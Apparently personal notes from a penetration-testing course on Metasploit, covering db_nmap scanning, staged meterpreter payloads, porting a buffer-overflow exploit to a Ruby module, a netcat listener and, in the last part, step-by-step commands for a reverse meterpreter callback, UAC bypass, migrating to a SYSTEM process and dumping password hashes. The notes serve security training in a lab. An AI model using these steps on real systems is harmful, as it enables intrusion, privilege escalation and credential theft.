We have used Metasploit previously for this course in past modules, we've generated shellcode, calculated buffers, and translated assembly to OP code using utilities from this framework, so what exactly is it? As described by it's authors the metasploit framework is an advanced open sourced platform written in ruby for developing, testing and using exploit code.

Metasploit can be handy in almost any phase of a penetration test, from passive and active information gathering to vulnerability research and development all the way to client side attacks and post-exploitation techniques.

There are several user interfaces that we can use to operate the metsaploit framework. The most popular is the interactive console msfconsole.

MSF requires several services to be running that are not enabled at boot time in Kali Linux.

To start the required postgres and metasploit service dependencies we can simply start them as we would any other service.
#/etc/init.d/postgresql start
#/etc/init.d/metasploit start

Now that everything is setup, we can start exploring the various exploits, auxiliary modules, payloads and plugins that the metasploit framework has to offer us.

To start the msfconsole
#msfconsole

The help command can get us started with the basic options msf has to offer.
msf>help

The metasploit framework contains hundreds of auxiliary modules which provide various functionality such as protocol enumeration, host discovering and more. These modules all follow a common syntax usage which makes them easy to explore and use. Let's try using some of these auxiliary modules and get a feel for the syntax needed to run the metasploit framework.

The "show auxiliary" command will display a long list of all the different auxiliary modules in the metasploit framework that can be used for various tasks such as information gathering, located under the 'gather' hierarchy, scnning and enumeration of various services located under the 'scanner' hierarchy, and so on.

If the metasploit and postgresql services are started ahead of time, the metasploit framework will log it's findings and information about discovered hosts in a convenient and accessible database. To display all discovered hosts up to this point, we can give the 'hosts' command from within msfconsole.

msf>hosts

To further populate this database, we can use the db_nmap metasploit wrapper to scan hosts with nmap and have the scan output inserted in to the database.

msf>db_nmap 10.11.1.1.-254 --top-ports 20

Once the scan is done, we can query the database for machines with specific properties. For example we can look for all machines with port 443 open.

msf>services -p 443

=============================================================
You can search for all the modules effecting a particular platform using the built-in search functionality of msfconsole. For example, use

msf> search platform:"Windows XP SP3" type:exploit

should find all the modules effecting Windows XP SP3. Use other regular expression variations as well such as Windows XP Service Pack 3 etc to get an idea.
==============================================================

Using the database - check out the looting commands towards the end.
https://www.offensive-security.com/metasploit-unleashed/using-databases/

Up to now, we have limited our payload use in metasploit to simple standard own reverse shell payloads.

Let's take some time to examine some additional payloads that the metasploit framework has to offer. One of the first distinctions which are mportant to make note of is between metasploit payload is between staged and non-stage shell code.

A non-staged payload is a payload that is sent in it's entirety as we have done up to this point.

A staged payload is usaully sent in 2 parts. The first is a small primary payload which usually instructs the victim to connect back to the attacker and accept a larger secondary payload and then executes it.

One of the most powerful tage payloads that the metasploit framework has to offer is the meterpreter payload. Meterpreter is a staged multifunction payload that can be dynamically extended at run time. In practise this means that the meterpreter shell provides more features and functionality than a reguler shell by having in built file uploads and downloads, keyloggers and so on. This additional functionality makes meterpreter the favourite and most commonly used payload in the metasploit framework.

Let's get a taste of the meterpreter payload by swapping out our non stage reverse shell to a reverse meterpreter connection in our slmail exploit.

Meterpreter simplifies many of the post exploitation processes such as uploading and downloading files. Let's try uploading and downloading netcat to the victim machine using the meterpreter upload function.

Metasploit offers us a huge variety of shellcode payloads. From payloads that connect to a victim machine using VNC to payloads which tunnel themselves out of an organisation using DNS querries. getting to know these variou payloads can help us significantly during a penetration test.

For example, the reverse meterpreter https payload is designed to encapsulate meterpreter communications within https requests allowing us to bypass most deep packet inspection filters.

Another nice example is the reverse_tcp_allports payload which attempts to connect back to our attacking machine on all ports which is useful in situations when we are not sure what egress firewall rules are in place.

The metasploit framework, not only has a wide range of available payloads, but can also output these various payloads in to various filetypes and formats such as asp, vbscript, java executable, windows dlls pe binaries and more.

Let's take a look at the msfveno utility and get a listing of paylaods available to us.

#msfvenom -l

This produces a really long list of all the different types of payloads that msfvenom can generate.

And proceed to edit the template that was just copied over.
#nano vulnserver.rb

Start by changing the name, description and author of the exploit.

Update the space for the ShellCode - 800 bytes
Update the return address to match the one that we used in our python code. - 0x65d11d71
Update the target description "Universal JMP ESP address"
Update the default RPORT to 5555

Now it is time to recreate our exploit buffer within this Ruby Exploit.
Remove the previous buffer setup for the slmail exploit.
For reference puposes, paste the buffer taken from the python exploit.

Make sure that the vulnerable server is running on the windows machine by running the shortcut in the tools directory.

msf>exploit

We have a shell.

============================================

See exercise 7.8.1.2.

Listener:
#nc -nvlp 443

Execute the exploit
#python vulnBO-4.py 10.11.25.139

============================================

1. Create a new directory in metasploit.
2. Create a new file in this directory and copy in the contents of the example exploit in the pdf.
3. Test using this exploit as is.
3. Adjust the values to match what it is I have in my exploit cross-poc-shell.py.
4. Test the exploit once more.

This is now working and the exploit is listed as crossfireSaidshow2.rb

So far we have seen file uploads and downloads along with simple session management however the metasploit framework has much more to offer in this field, from privilege escalation, dumping windows hashes, running keyloggers and even taking screenshots of the victim machine. But first before we get start its crucial to get a full understanding of the privileges we have on the system especially when working with windows OS.

Let's use a reverse meterpreter shell as an example.

While our shell may have been run by an admin user, we may still face restrictions such as UAC or require process migration for our post exploitation modules to work.

The getuid command shows that we have the privileges of the 'offsec' user. We already know that this user is an admin.

meterpreter>getuid

the getprivs command shows that the current shell has UAC restrictions imposed on it.

meterpreter>getprivs

This means if we try and run a post exploitation module such as 'hashdump', the process may fail as I do not have the correct privileges to run this module. In this case I will first need to bypass UAC.

In order to bypass UAC, I need to background the current meterpreter session:
meterpreter>background

Now invoke a metasploit module able to bypass UAC.

msf>use exploit/windows/local/bypassuac

msf>set SESSION 1

msf>set PAYLOAD windows/meterpreter/reverse_tcp

msf>set LHOST 10.11.0.179

msf>set LPORT 8888 (NOTE: This needs to be a port that is not already in use. Eg, a different port to the original session.)

msf>run

This will upload a file and execute a new reverse shell with improved privileges. See with the getprivs command that there is now a much larger set of privileges.

meterpreter>getprivs

Now that we have non UAC restricted admin shell, let's try hashdump once more

meterpreter>hashdump

This fails once more. This module needs to run with system privileges.

To solve this problem we can try migrating the current meterpreter process to an existing process that is running with system privileges such as the SNMP service.

List all running processes and their privilege with the ps command.

meterpreter>ps

Let's have meterpreter migrate to this process.

meterpreter>migrate 1468

A getuid command should now show that the meterpreter process is running with system privileges.

meterpreter>getprivs

Hashdump now completes successfully.

meterpreter>hashdump

background this second system privileged shell and list all sessions that we currently have: